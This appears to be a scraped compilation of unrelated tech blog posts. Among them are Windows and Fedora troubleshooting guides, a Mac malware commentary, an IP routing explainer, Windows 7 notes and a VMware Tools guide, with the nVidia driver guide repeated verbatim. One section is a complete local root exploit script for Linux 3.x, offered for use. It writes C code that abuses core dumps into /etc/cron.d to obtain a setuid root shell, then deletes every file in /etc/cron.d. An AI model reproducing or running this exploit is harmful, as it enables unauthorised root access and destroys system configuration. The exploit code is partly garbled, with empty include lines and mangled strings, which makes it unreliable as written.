Microsoft Error 1000 Win7 Explorer 6.1

 

If you experience an problem with Windows explorer, crashing (restarting) and “checking for solutions” frequently, please check your event log (start menu – Control Panel ->All Control Panel Items ->Administrative Tools ->Event viewer) and check your system for details:

Error 1000

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0x1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:Windowsexplorer.exe
Faulting module path: C:Program FilesDivXDivX Plus Media Foundation ComponentsDivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary Solution – Uninstall Divx

As you can see, the problem can easily be rectified, but only if you know what your doing. The conflicting / manifested dll or other file, could be malware or linked to a bigger program.

p.s this error had to be placed here as the Microsoft site has changed to only promote bug reports on, evaluating software only 🙂

Exploit Title: Linux 3.x.x Executable File Read Exploit

# Date: 6/26/12
# Version: 3.x.x
# Category:: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + effected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others …
# ~
# Use this at your own risk, I’m not responsible for any risk.
# sorchfox@hotmail.com

cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include

char *payload=”nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/coren”;

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir(“/etc/cron.d”);
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system(“/bin/sh”);
system(“rm -rf /tmp/s”);
system(“rm -rf /etc/cron.d/*”);
return 0;
}
__EOF__
echo “wait aprox 4 min to get sh”
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

This is guide, howto install nVidia proprietary drivers on Fedora 14 and disable Nouveau driver.

 

I write this guide about two weeks ago, but I Delayed the publication of this guide, because of pyxf86config bug, which cause following livna-config-display errors on boot:


Checking for module nvidia.ko: [ OK ]
Enabling the nvidia driver: Traceback (most recent call last):
File “/usr/sbin/nvidia-config-display”, line 28, in
import livnaConfigDisplay.ConfigDisplay
File “/usr/lib/python2.7/site-packages/livnaConfigDisplay/ConfigDisplay.py”, line 29, in
import xf86config
File “/usr/lib/python2.7/site-packages/xf86config.py”, line 1, in
import ixf86config
ImportError: /usr/lib/python2.7/site-packages/ixf86configmodule.so: undefined symbol: xstrtokenize
[FAILED]

But now, on my own testing and others testing, everything seems to work well with pyxf86config and livna-config-display when pyxf86config bug has been fixed.

This guide works with GeForce 6/7/8/9/200/300 series cards and also with GeForce FX cards.

Install nVidia proprietary drivers on Fedora 14 and disable the nouveau driver

1. Change root user

su -
## OR ##
sudo -i

2. Make sure that you are running latest kernel

If not then update kernel and reboot

yum update kernel*
reboot

3. Add RPMFusion Repositories (Free and Non-Free)

rpm -Uvh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm
rpm -Uvh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm

4. Install nVidia proprietary drivers

4a. Install nVidia proprietary drivers for GeForce 6/7/8/9/200/300 series cards

Select kmodkmod-PAE or akmod from following.

kmod-nvidia

yum install kmod-nvidia xorg-x11-drv-nvidia-libs

or

kmod-nvidia-PAE kernel

yum install kmod-nvidia-PAE

or

akmod-nvidia

yum install akmod-nvidia xorg-x11-drv-nvidia-libs

kmod works fine for most people, but it doesn’t work on systems with different kernel

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

Full spec of kmod and akmod differences, check this.

4b. Install nVidia proprietary drivers for GeForce FX cards

Select kmodkmod-PAE or akmod from following.

kmod-nvidia and kmod-nvidia-PAE

yum --enablerepo=rpmfusion-nonfree-updates-testing install kmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

or

kmod-nvidia-PAE kernel

yum --enablerepo=rpmfusion-nonfree-updates-testing  install kmod-nvidia-173xx-PAE

or

akmod-nvidia

yum --enablerepo=rpmfusion-nonfree-updates-testing install akmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

kmod works fine for most people, but it doesn’t work on systems with different kernel

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

Full spec of kmod and akmod differences, check this.

5. Check /etc/X11/xorg.conf file

This should not be necessary, but I recommend this, because of pyxf86config bug.

Open /etc/X11/xorg.conf file and check following rows:
32-bit

Section "Files"
    ModulePath   "/usr/lib/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib/xorg/modules"
EndSection

64-bit

Section "Files"
    ModulePath   "/usr/lib64/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib64/xorg/modules"
EndSection

If section files is missing then it have to be added manually.

6. Check /boot/grub/grub.conf file

This should not be necessary, but missing rdblacklist=nouveau nouveau.modeset=0 is the most common reason which causes black screen / blank screen on boot with nVidia drivers. So it’s good to check followin also. 😉

Open /boot/grub/grub.conf file and check that the kernel row have following rdblacklist=nouveau nouveau.modeset=0:

title Fedora (2.6.35.6-48.fc14.i686)
        root (hd0,0)
        kernel /vmlinuz-2.6.35.6-48.fc14.i686 .... rdblacklist=nouveau nouveau.modeset=0
        initrd /initramfs-2.6.35.6-48.fc14.i686.img

7. Finally all is done and then reboot

reboot

Please let me know if you have some problems with nVidia drivers installation. You could also tell you if you got the drivers installed using this guide and what graphics card you have?

This is guide, howto install nVidia proprietary drivers on Fedora 14 and disable Nouveau driver. I write this guide about two weeks ago, but I Delayed the publication of this guide, because of pyxf86config bug, which cause following livna-config-display errors on boot:

Checking for module nvidia.ko: [ OK ]
Enabling the nvidia driver: Traceback (most recent call last):
File “/usr/sbin/nvidia-config-display”, line 28, in
import livnaConfigDisplay.ConfigDisplay
File “/usr/lib/python2.7/site-packages/livnaConfigDisplay/ConfigDisplay.py”, line 29, in
import xf86config
File “/usr/lib/python2.7/site-packages/xf86config.py”, line 1, in
import ixf86config
ImportError: /usr/lib/python2.7/site-packages/ixf86configmodule.so: undefined symbol: xstrtokenize
[FAILED]

But now, on my own testing and others testing, everything seems to work well with pyxf86config and livna-config-display when pyxf86config bug has been fixed.

This guide works with GeForce 6/7/8/9/200/300 series cards and also with GeForce FX cards.

Install nVidia proprietary drivers on Fedora 14 and disable the nouveau driver

1. Change root user

su -
## OR ##
sudo -i

2. Make sure that you are running latest kernel

If not then update kernel and reboot

yum update kernel*
reboot

3. Add RPMFusion Repositories (Free and Non-Free)

rpm -Uvh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm
rpm -Uvh http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm

4. Install nVidia proprietary drivers

4a. Install nVidia proprietary drivers for GeForce 6/7/8/9/200/300 series cards

Select kmodkmod-PAE or akmod from following.

kmod-nvidia

yum install kmod-nvidia xorg-x11-drv-nvidia-libs

or

kmod-nvidia-PAE kernel

yum install kmod-nvidia-PAE

or

akmod-nvidia

yum install akmod-nvidia xorg-x11-drv-nvidia-libs

kmod works fine for most people, but it doesn’t work on systems with different kernel

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

Full spec of kmod and akmod differences, check this.

4b. Install nVidia proprietary drivers for GeForce FX cards

Select kmodkmod-PAE or akmod from following.

kmod-nvidia and kmod-nvidia-PAE

yum --enablerepo=rpmfusion-nonfree-updates-testing install kmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

or

kmod-nvidia-PAE kernel

yum --enablerepo=rpmfusion-nonfree-updates-testing  install kmod-nvidia-173xx-PAE

or

akmod-nvidia

yum --enablerepo=rpmfusion-nonfree-updates-testing install akmod-nvidia-173xx xorg-x11-drv-nvidia-173xx-libs.i686

kmod works fine for most people, but it doesn’t work on systems with different kernel

  • like a self-compiled kernel
  • an older Fedora kernel
  • the quickly changing kernels from updates-testing/rawhide

Full spec of kmod and akmod differences, check this.

5. Check /etc/X11/xorg.conf file

This should not be necessary, but I recommend this, because of pyxf86config bug.

Open /etc/X11/xorg.conf file and check following rows:
32-bit

Section "Files"
    ModulePath   "/usr/lib/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib/xorg/modules"
EndSection

64-bit

Section "Files"
    ModulePath   "/usr/lib64/xorg/modules/extensions/nvidia"
    ModulePath   "/usr/lib64/xorg/modules"
EndSection

If section files is missing then it have to be added manually.

6. Check /boot/grub/grub.conf file

This should not be necessary, but missing rdblacklist=nouveau nouveau.modeset=0 is the most common reason which causes black screen / blank screen on boot with nVidia drivers. So it’s good to check followin also. 😉

Open /boot/grub/grub.conf file and check that the kernel row have following rdblacklist=nouveau nouveau.modeset=0:

title Fedora (2.6.35.6-48.fc14.i686)
        root (hd0,0)
        kernel /vmlinuz-2.6.35.6-48.fc14.i686 .... rdblacklist=nouveau nouveau.modeset=0
        initrd /initramfs-2.6.35.6-48.fc14.i686.img

7. Finally all is done and then reboot

reboot

Please let me know if you have some problems with nVidia drivers installation. You could also tell you if you got the drivers installed using this guide and what graphics card you have?

How-to-upgrade-fedora-using-preupgrade/

Coming from a Debian background, upgrading to new releases is second nature. Unfortunately, Fedora doesn’t seem to have it quite as down pat. Nevertheless, it’s possible and works quite well (but there are pitfalls, so read on).

While upgrading via PackageKit is coming, there’s a pretty decent way of doing it with PreUpgrade.

First, update your current system:
yum update

Install preupgrade:
yum install preupgrade

Run the preupgrade tool, and follow the prompts (remote upgrades over VNC also supported):
preupgrade

PreUpgrade will prompt to reboot your computer and will update your system automatically. All of your packages should be updated and your repositories configured for you (I also had RPMFusion, Chromium and yum-rawhide which all updated as expected). On one of my systems, even the NVIDIA driver was automatically updated and configured. Now you’re booted into your new Fedora 14 system.

OK, this is where things get a little tricky. Some packages might be no-longer supported, there might be removed dependencies and the like. So, there are two neat commands that we will use to identify these packages, so that you can remove them.

package-cleanup --orphans
package-cleanup --leaves

But wait.. I discovered that there’s a more important step to do first, or you’ll cause yourself a headache!

On my machine, this wanted to remove some pretty important packages, like kdelibs.
[username@shem ~]$ sudo package-cleanup --orphans
[sudo] password for username:
Loaded plugins: refresh-packagekit, remove-with-leaves
akonadi-1.4.0-3.fc13.x86_64
kdeedu-marble-4.5.2-2.fc13.x86_64
kdeedu-marble-libs-4.5.2-2.fc13.x86_64
kdelibs-4.5.2-8.fc13.x86_64
kdelibs-common-4.5.2-8.fc13.x86_64
schroedinger-1.0.10-1.fc13.x86_64
xorg-x11-drv-wacom-0.10.8-2.fc13.x86_64

Fedora (unlike certain other distros I know) provides major updates to the latest versions of packages (like OpenOffice.org, KDE, GNOME, etc). Yay! It’s possible that your new Fedora system is running the same version of, say KDE, as your old one. This was indeed the case with my Fedora 13 to 14 upgrade (both run KDE 4.5.2 at time of F14 release).

Actually, the build of some important packages on Fedora 13 (like kdelibs-4.5.2-8.fc13.x86_64) were actually more recent than on the newer Fedora 14 system (kdelibs-4.5.2-5.fc14.x86_64).

The package-cleanup tool correctly lists kdelibs-4.5.2-8.fc13.x86_64 as being an orphan and if you were to remove this, you’d break your system badly. In fact, if you’re running yum’s brilliant new autoremove deps feature, as I am, you’ll lose most of your system. It makes sense – you are telling yum to remove kdelibs, so it goes and removes everything that relies on it! Yikes.

So first, we need to fix this by running the yum distro-sync command which recognises that we need to downgrade that kdelibs packages (and not remove it!).

[chris@shem ~]$ sudo yum distro-sync
Loaded plugins: refresh-packagekit, remove-with-leaves
Setting up Distribution Synchronization Process
Resolving Dependencies
--> Running transaction check
---> Package akonadi.x86_64 0:1.4.0-1.fc14 will be a downgrade
---> Package akonadi.x86_64 0:1.4.0-3.fc13 will be erased
---> Package kdeedu-marble.x86_64 0:4.5.2-1.fc14 will be a downgrade
---> Package kdeedu-marble.x86_64 0:4.5.2-2.fc13 will be erased
---> Package kdeedu-marble-libs.x86_64 0:4.5.2-1.fc14 will be a downgrade
---> Package kdeedu-marble-libs.x86_64 0:4.5.2-2.fc13 will be erased
---> Package kdelibs.x86_64 6:4.5.2-5.fc14 will be a downgrade
---> Package kdelibs.x86_64 6:4.5.2-8.fc13 will be erased
---> Package kdelibs-common.x86_64 6:4.5.2-5.fc14 will be a downgrade
---> Package kdelibs-common.x86_64 6:4.5.2-8.fc13 will be erased
---> Package schroedinger.x86_64 0:1.0.9-2.fc14 will be a downgrade
---> Package schroedinger.x86_64 0:1.0.10-1.fc13 will be erased
---> Package xorg-x11-drv-wacom.x86_64 0:0.10.8-1.20100726.fc14 will be a downgrade
---> Package xorg-x11-drv-wacom.x86_64 0:0.10.8-2.fc13 will be erased
--> Finished Dependency Resolution
--> Finding unneeded leftover dependencies
Found and removing 0 unneeded dependencies
----
Dependencies Resolved
=================================================
Package Arch Version Repository Size
=================================================
Downgrading:
akonadi x86_64 1.4.0-1.fc14 fedora 677 k
kdeedu-marble x86_64 4.5.2-1.fc14 fedora 14 M
kdeedu-marble-libs x86_64 4.5.2-1.fc14 fedora 902 k
kdelibs x86_64 6:4.5.2-5.fc14 fedora 12 M
kdelibs-common x86_64 6:4.5.2-5.fc14 fedora 1.7 M
schroedinger x86_64 1.0.9-2.fc14 fedora 276 k
xorg-x11-drv-wacom x86_64 0.10.8-1.20100726.fc14 fedora 73 k
---
Transaction Summary
=================================================
Downgrade 7 Package(s)
---
Total download size: 30 M
Is this ok [y/N]

Once we downgrade these packages, we can then remove any other orphans we might have, with package-cleanup –leaves and package-cleanup –orphans (I didn’t have any). One last thing to note – Fedora will not replace packages from the newer release if they are exactly the same version. For this reason, you will probably have some F13 packages still installed on your computer – don’t worry, that’s correct. They will be upgraded in time (if required).

So, now I think I know how to successfully upgrade the system without breaking it :-) If anyone has some other tips or corrections, please let me know! Hope that’s helpful.

Mac OS-X Malware

People for many, many years thought that if you had a Apple Mac computer then you was invulnerable against virus, malware, spyware, and more types of treats!

Well they have always been wrong, for many years Apple have wanted to compete against other giants like Linux, or Windows. so when they brought out the iPad and iPhone, it increased their vulnerability because of popularity. I hope they would understand this and induce extra security and immunise their systems, even thought we all know how BAD to put it politely iShit is. So if you want to find out………………………………………………………Protect yourself by using XProtect

Malware for Mac OS does exist and it’s becoming more and more widespread. In particular OSX/Pinheard-B, as categorized by Sophos, and better known as HellRTS is a malware that gives complete remote control of the infected OS-X machine: you can take snapshots, send emails, transfer files and log keystrokes from the victim. Apple, however, seems to be pleased by this misbelief and doesn’t do anything to wake up its users to the malware call: an update to Snow Leopard included a silent update to Xprotect.plist. XProtect is, in the words of Graham Cluley Senior Security Consultant at Sophos, a rudimentary file that contains elementary signatures of a handful of Mac threats. Starting from version 10.6, OS-X users are warned when suspicious files are downloaded and executed from Entourage, Safari, Mail, Thunderbird and other browsing tools. This kind of protection is rather sloppy as malware can get through by means of Skype, BitTorrent or other tools that are currently unsupported by Mac OS-X builtin signature-based malware protection.

More info exists Here

The update schedule for Snow Leopard has been:

  • 10.6           –       August 28, 2009 (release date)
  • 10.6.1        –       September 10, 2009
  • 10.6.2        –       November 9, 2009
  • 10.6.3        –       March 29, 2010 (revised April 13, 2010)
  • 10.6.4        –       June 15, 2010

This last update included an update to XProtect to protect against OSX.HellRTS (aka OSX/Pinhead-B). This has doubled the size of the file.

Most Mac malware solutions protected against OSX/Pinhead-B by the end of April. Waiting for an OS update to protect against malware could prove costly if this backdoor steals your personal information not least because XProtect only scans download (not installed) files. So there you have it the prouf is in the pudding! so it out of it will sort YOU!

IP Routing Explained

IP Routing

We now take up the question of finding the host that datagram’s go to based on the IP address. Different parts of the address are handled in different ways; it is your job to set up the files that indicate how to treat each part.

IP Networks

When you write a letter to someone, you usually put a complete address on the envelope specifying the country, state, and Zip Code. After you put it in the mailbox, the post office will deliver it to its destination: it will be sent to the country indicated, where the national service will dispatch it to the proper state and region. The advantage of this hierarchical scheme is obvious: wherever you post the letter, the local postmaster knows roughly which direction to forward the letter, but the postmaster doesn’t care which way the letter will travel once it reaches its country of destination.

IP networks are structured similarly. The whole Internet consists of a number of proper networks, called autonomous systems. Each system performs routing between its member hosts internally so that the task of delivering a datagram is reduced to finding a path to the destination host’s network. As soon as the datagram is handed to any host on that particular network, further processing is done exclusively by the network itself.

Subnetworks

This structure is reflected by splitting IP addresses into a host and network part, as explained previously. By default, the destination network is derived from the network part of the IP address. Thus, hosts with identical IP network numbers should be found within the same network.[1]

It makes sense to offer a similar scheme inside the network, too, since it may consist of a collection of hundreds of smaller networks, with the smallest units being physical networks like Ethernets. Therefore, IP allows you to subdivide an IP network into several subnets.

A subnet takes responsibility for delivering datagram’s to a certain range of IP addresses. It is an extension of the concept of splitting bit fields, as in the A, B, and C classes. However, the network part is now extended to include some bits from the host part. The number of bits that are interpreted as the subnet number is given by the so-called subnet mask, or netmask. This is a 32-bit number too, which specifies the bit mask for the network part of the IP address.

The campus network of Groucho Marx University is an example of such a network. It has a class B network number of 149.76.0.0, and its netmask is therefore 255.255.0.0.

Internally, GMU’s campus network consists of several smaller networks, such various departments’ LANs. So the range of IP addresses is broken up into 254 subnets, 149.76.1.0 through 149.76.254.0. For example, the department of Theoretical Physics has been assigned 149.76.12.0. The campus backbone is a network in its own right, and is given 149.76.1.0. These subnets share the same IP network number, while the third octet is used to distinguish between them. They will thus use a subnet mask of 255.255.255.0.

Figure 2-1 shows how 149.76.12.4, the address of quark, is interpreted differently when the address is taken as an ordinary class B network and when used with subnetting.

Figure 2-1. Subnetting a class B network

It is worth noting that subnetting (the technique of generating subnets) is only an internal division of the network. Subnets are generated by the network owner (or the administrators). Frequently, subnets are created to reflect existing boundaries, be they physical (between two Ethernets), administrative (between two departments), or geographical (between two locations), and authority over each subnet is delegated to some contact person. However, this structure affects only the network’s internal behaviour, and is completely invisible to the outside world.

Gateways

Subnetting is not only a benefit to the organization; it is frequently a natural consequence of hardware boundaries. The viewpoint of a host on a given physical network, such as an Ethernet, is a very limited one: it can only talk to the host of the network it is on. All other hosts can be accessed only through special-purpose machines called gateways. A gateway is a host that is connected to two or more physical networks simultaneously and is configured to switch packets between them.

Figure 2-2 shows part of the network topology at Groucho Marx University (GMU). Hosts that are on two subnets at the same time are shown with both addresses.

Figure 2-2. A part of the net topology at Groucho Marx University

Different physical networks have to belong to different IP networks for IP to be able to recognize if a host is on a local network. For example, the network number 149.76.4.0 is reserved for hosts on the mathematics LAN. When sending a datagram to quark, the network software on erdos immediately sees from the IP address 149.76.12.4 that the destination host is on a different physical network, and therefore can be reached only through a gateway (sophus by default).

sophus itself is connected to two distinct subnets: the Mathematics department and the campus backbone. It accesses each through a different interface, eth0 and fddi0, respectively. Now, what IP address do we assign it? Should we give it one on subnet 149.76.1.0, or on 149.76.4.0?

The answer is: “both.” sophus has been assigned the address 149.76.1.1 for use on the 149.76.1.0 network and address 149.76.4.1 for use on the 149.76.4.0 network. A gateway must be assigned one IP address for each network it belongs to. These addresses—along with the corresponding netmask—are tied to the interface through which the subnet is accessed. Thus, the interface and address mapping for sophus would look like this:

Interface
Address
Netmask

eth0
149.76.4.1
255.255.255.0

fddi0
149.76.1.1
255.255.255.0

lo
127.0.0.1
255.0.0.0

The last entry describes the loopback interface lo, which we talked about earlier.

Generally, you can ignore the subtle difference between attaching an address to a host or its interface. For hosts that are on one network only, like erdos, you would generally refer to the host as having this-and-that IP address, although strictly speaking, it’s the Ethernet interface that has this IP address. The distinction is really important only when you refer to a gateway.

The Routing Table

We now focus our attention on how IP chooses a gateway to use to deliver a datagram to a remote network.

We have seen that erdos, when given a datagram for quark, checks the destination address and finds that it is not on the local network. erdos therefore sends the datagram to the default gateway sophus, which is now faced with the same task. sophus recognizes that quark is not on any of the networks it is connected to directly, so it has to find yet another gateway to forward it through. The correct choice would be niels, the gateway to the Physics department. sophus thus needs information to associate a destination network with a suitable gateway.

IP uses a table for this task that associates networks with the gateways by which they may be reached. A catch-all entry (the default route) must generally be supplied too; this is the gateway associated with network 0.0.0.0. All destination addresses match this route, since none of the 32 bits are required to match, and therefore packets to an unknown network are sent through the default route. On sophus, the table might look like this:

Network
Netmask
Gateway
Interface

149.76.1.0
255.255.255.0

fddi0

149.76.2.0
255.255.255.0
149.76.1.2
fddi0

149.76.3.0
255.255.255.0
149.76.1.3
fddi0

149.76.4.0
255.255.255.0

eth0

149.76.5.0
255.255.255.0
149.76.1.5
fddi0




0.0.0.0
0.0.0.0
149.76.1.2
fddi0

If you need to use a route to a network that sophus is directly connected to, you don’t need a gateway; the gateway column here contains a hyphen.

The process for identifying whether a particular destination address matches a route is a mathematical operation. The process is quite simple, but it requires an understanding of binary arithmetic and logic: A route matches a destination if the network address logically ANDed with the netmask precisely equals the destination address logically ANDed with the netmask.

Translation: a route matches if the number of bits of the network address specified by the netmask (starting from the left-most bit, the high order bit of byte one of the address) match that same number of bits in the destination address.

When the IP implementation is searching for the best route to a destination, it may find a number of routing entries that match the target address. For example, we know that the default route matches every destination, but datagram’s destined for locally attached networks will match their local route, too. How does IP know which route to use? It is here that the netmask plays an important role. While both routes match the destination, one of the routes has a larger netmask than the other. We previously mentioned that the netmask was used to break up our address space into smaller networks. The larger a netmask is, the more specifically a target address is matched; when routing datagram’s, we should always choose the route that has the largest netmask. The default route has a netmask of zero bits, and in the configuration presented above, the locally attached networks have a 24-bit netmask. If a datagram matches a locally attached network, it will be routed to the appropriate device in preference to following the default route because the local network route matches with a greater number of bits. The only datagram’s that will be routed via the default route are those that don’t match any other route.

You can build routing tables by a variety of means. For small LANs, it is usually most efficient to construct them by hand and feed them to IP using the route command at boot time. For larger networks, they are built and adjusted at runtime by routing daemons; these daemons run on central hosts of the network and exchange routing information to compute “optimal” routes between the member networks.

Depending on the size of the network, you’ll need to use different routing protocols. For routing inside autonomous systems (such as the Groucho Marx campus), the internal routing protocols are used. The most prominent one of these is the Routing Information Protocol (RIP), which is implemented by the BSD routed daemon. For routing between autonomous systems, external routing protocols like External Gateway Protocol (EGP) or Border Gateway Protocol (BGP) have to be used; these protocols, including RIP, have been implemented in the University of Cornell’s gated daemon.

Metric Values

We depend on dynamic routing to choose the best route to a destination host or network based on the number of hops. Hops are the gateways a datagram has to pass before reaching a host or network. The shorter a route is, the better RIP rates it. Very long routes with 16 or more hops are regarded as unusable and are discarded.

RIP manages routing information internal to your local network, but you have to run gated on all hosts. At boot time, gated checks for all active network interfaces. If there is more than one active interface (not counting the loopback interface), it assumes the host is switching packets between several networks and will actively exchange and broadcast routing information. Otherwise, it will only passively receive RIP updates and update the local routing table.

When broadcasting information from the local routing table, gated computes the length of the route from the so-called metric value associated with the routing table entry. This metric value is set by the system administrator when configuring the route, and should reflect the actual route cost.[2] Therefore, the metric of a route to a subnet that the host is directly connected to should always be zero, while a route going through two gateways should have a metric of two. You don’t have to bother with metrics if you don’t use RIP or gated.

Notes

[1]

Autonomous systems are slightly more general. They may comprise more than one IP network.

[2]

The cost of a route can be thought of, in a simple case, as the number of hops required to reach the destination. Proper calculation of route costs can be a fine art in complex network designs.

Windows 7 installation

Hi a lot of people seem to be having problems installing windows7, there are many ways to complete this;

fresh install

Network

3 party (usb, ext HDD) etc

Local pre install

and

Upgrade

The latter seems to be what I would suggest to the public and most end-users, yes this was the least favourable option in the overall Microsoft Operating Systems but proven to be the most stable. You get the updates to the install files and keep your existing drivers, which you can update later, for example your Graphics driver. Many users and professionals are reporting driver problems with the RC with regarding the Fresh install option and network install, because the DVD image (which you should burn with ISO Burn, Nero, or something similar) has to provide the generic drivers for your system, if there is an issues with the DVD then the setup will not complete, also the downloaded image supplied from Microsoft will not always automatically create the partitions needed for the install so you would get an error code like “0x80070570” indicating that you do not have enuff space to place Windows 7. so you can see if you are not sure or want some reliability in your new installation use the upgrade option in the Windows 7 install and have fun.

http://www.microsoft.com/windows/windows-7/download.aspx

http://www.microsoft.com/windows/windows-vista/get/upgrade-advisor.aspx

Windows 7 v’s Vista v’s XP

Hey there fellas, I have some results on Windows 7!! Thanks to people like Nicholas Wilkinson and others for dropping me a message, I’ve built some information up for you, I hope you enjoy it.

How does Windows 7 beta 1 compare to Vista and XP in terms of performance? That’s a question that’s been hitting my inbox regularly over the past few weeks. Let’s see if we can’t answer it!

Important note: Before I go any further I feel I need to make a point, and make it clear. The build I’m testing of Windows 7 (build 6.1.7000.0.081212-1400) is a beta build, and as a rule beta builds are usually more geared towards stability than performance. That said, the performance of this build should give us a clue as to how the OS is coming along.

Rather than publish a series of benchmark results for the three operating systems (something which Microsoft frowns upon for beta builds, not to mention the fact that the final numbers only really matter for the release candidate and RTM builds), I’ve decided to put Windows 7, Vista and XP head-to-head in a series of real-world tests to find out which OS comes out top.

The tests

There are 23 tests in all, most of which are self explanatory:

  1. Install OS – Time it takes to install the OS
  2. Boot up – Average boot time to usable desktop
  3. Shut down – Average shut down time
  4. Move 100MB files – Move 100MB of JPEG files from one hard drive to another
  5. Move 2.5GB files – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from one hard drive to another
  6. Network transfer 100MB files – Move 100MB of JPEG files from test machine to NAS device
  7. Network transfer 2.5GB files – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from test machine to NAS device
  8. Move 100MB files under load – Move 100MB of JPEG files from one hard drive to another while ripping DVD to .ISO file
  9. Move 2.5GB files under load – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from one hard drive to another while ripping DVD to .ISO file
  10. Network transfer 100MB files under load – Move 100MB of JPEG files from test machine to NAS device while ripping DVD to .ISO file
  11. Network transfer 2.5GB files under load – Move 2.5GB of mixed size files (ranging from 1MB to 100MB) from test machine to NAS device while ripping DVD to .ISO file
  12. Compress 100MB files – Using built-in ZIP compression
  13. Compress 1GB files – Using built-in ZIP compression
  14. Extract 100MB files – Using built-in ZIP compression
  15. Extract 1GB files – Using built-in ZIP compression
  16. Install Office 2007 – Ultimate version, from DVD
  17. Open 10 page Word doc – Text only
  18. Open 100 page Word doc – Text and images only
  19. Open simple Excel doc – Basic formatting
  20. Open complex Excel doc – Including formula and charts
  21. Burn DVD – Win 7 beta 1 .ISO to disc using CDBurnerXP
  22. Open 10 page PDF – Text only, using latest Adobe Reader 8
  23. Open 100 page PDF – Text and images, using latest Adobe Reader 8

These series of tests will pitch Windows 7 build 7000 32-bit against Windows Vista SP1 32-bit and Windows XP SP3 32-bit. The scoring for each of the tests is simple. The winning OS scores 1, the runner up 2 and the loser scores a 3. The scores are added up and the OS with the lowest score at the end wins.

The test systems

I’ve used two desktop systems as the test machines:

  • An AMD Phenom 9700 2.4GHz system fitted with an ATI Radeon 3850 and 4GB of RAM
  • An Intel Pentium Dual Core E2200 2.2GHz fitted with an NVIDIA GeForce 8400 GS and 1GB of RAM

The results

Here are the results of the tests for the two systems:

Conclusion

The bottom line is that the more I use Windows 7 the more I like it. Sure, we’re looking at a beta build here and not the final code, so things could change between now and release (although realistically final code ends up being faster than beta code). Also I still have some nagging issues relating to the interface, and some concerns that the UAC changes will break applications and other code, especially installers, but overall Windows 7 beta 1 is a robust, solid bit of code.

Sure, Windows 7 is not XP, and never will be (thankfully). And if you’re put off by things such as activation and DRM, then Windows isn’t the OS for you (good news is there are others to choose from). But if you’re looking for a solid OS then Windows 7 seems ready to deliver just that – a fast, reliable, relatively easy to use platform for your hardware and software.

Final curtain for UIQ Symbian interface

According to a report by Swedish online magazine mobil.se, the Swedish software company UIQ has given notice to all of its 270 employees. UIQ produces one of the two interfaces for the Symbian OS smartphone operating system. Smartphones with this interface were produced by UIQ’s owners Motorola and Sony Ericsson, among others, but both vendors recently decided to abandon the platform.

Sony Ericsson had already announced the end of UIQ at the Symbian Smartphone Show last October. The Japanese-Swedish vendor still plans to provide financial support for UIQ for some time to give the company a chance for negotiating a partial or complete takeover by an investor. Individual employees are also to receive support, for example if they decide to start their own business. Motorola is restructuring its mobile phone sector and plans to exclusively use its own P2k platform as well as Android and Microsoft Windows Mobile in the future.

The Symbian Foundation was initially formed to create a uniform platform with a common user interface framework from the competing UIQ and S60 interfaces. In the meantime, however, Nokia has presented an improved S60 interface that is optimised for touch screen operation.

VMware Tools on Ubuntu

HowTo: VMware Tools on Ubuntu 8.10 Server


I managed to install VMware Tools on Ubuntu 8.10 Server build 110271. It was complicated so I thought I’d share because you just can’t find a good guide for 8.10 at the moment. Now When you define your VM, set the network adapter to be E1000 at first.
INSTALLING THE OS
Start the virtual machine and in the console select the language and press F4 to change the mode to Install a minimum virtual machine. Press Enter to start the installation.
Select the following items from the desired services (this is for what I intend to do with my server, you might need different options):

  • Basic Ubuntu server
  • OpenSSH server
  • Samba file server
  • Virtual Machine host
  • Lamp server

Don’t forget to install raid if you need it and attach all your drives.
Log into the machine and update it with: your details

Code:

sudo apt-get update
sudo apt-get upgrade

I also added fluxBox and Webmin for extra ease of use, you may want to check these out!

INSTALL THE VMWARE TOOLS

According to Peter Cooper and many other posts out there, there is a problem compiling VMware tools in Ubuntu. So we will follow the workaround using parts of the open source tools.

Install dependency for VMware Tools:

Code:

sudo apt-get install build-essential linux-headers-$(uname -r) psmisc
sudo apt-get install gcc binutils make wget

